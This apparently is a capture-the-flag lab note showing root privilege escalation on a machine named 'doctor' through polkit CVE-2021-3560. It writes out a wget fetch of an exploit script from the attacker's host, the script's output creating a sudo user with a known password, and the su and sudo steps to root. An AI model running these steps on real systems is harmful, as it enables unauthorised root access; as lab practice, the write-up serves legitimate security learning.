InfoSec LAB

Doctor_Privilege_Escalation_3

Created: 3 min read

CVE-2021-3560

PEAS discovered that the target system is vulnerable to CVE-2021-3560

a vulnerability was found in polkit (affected version not known). It has been rated as critical. Affected by this issue is an unknown code of the component D-Bus Request Handler. The manipulation with an unknown input leads to a authorization vulnerability. Using CWE to declare the problem leads to CWE-863. The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. Impacted is confidentiality, integrity, and availability.

Exploit

I found an exploit online

Exploitation

web@doctor:/dev/shm$ wget http://10.10.14.9:8000/kernelbuster/CVE-2021-3560/CVE-2021-3560.py
--2022-12-26 16:47:06--  http://10.10.14.9:8000/kernelbuster/CVE-2021-3560/CVE-2021-3560.py
connecting to 10.10.14.9:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 7452 (7,3K) [text/x-python]
saving to: ‘CVE-2021-3560.py’
 
CVE-2021-3560.py    100%[===================>]   7,28K  --.-KB/s    in 0,08s

Delivery complete

web@doctor:/dev/shm$ python3 CVE-2021-3560.py
 
        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.    Y  / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_______|__\____/_/|_/___/\___/\____/_/|_/____/....
    
unicord: Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation
username: unicord
password: unicord
depends: Dependencies for exploit are met!
exploit: New user created!
prepare: New password hash generated!
exploit: Password configured for new user!
success: Created Sudo user "unicord" with password "unicord"!

Exploit successful. It should have created a user with sudo privileges

web@doctor:/dev/shm$ su unicord
password: unicord
 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details

Changing to the newly created user first

unicord@doctor:/dev/shm$ sudo su root
[sudo] password for unicord: unicord
 
root@doctor:/dev/shm# whoami
root
root@doctor:/dev/shm# hostname
doctor
root@doctor:/dev/shm# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.209  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:a8d6  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:a8d6  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:a8:d6  txqueuelen 1000  (Ethernet)
        RX packets 165599  bytes 21817001 (21.8 MB)
        RX errors 0  dropped 113  overruns 0  frame 0
        TX packets 170886  bytes 164861594 (164.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 729832  bytes 190899546 (190.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 729832  bytes 190899546 (190.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions

Then to the root user System Level Compromise

Interactive Graph View

Backlinks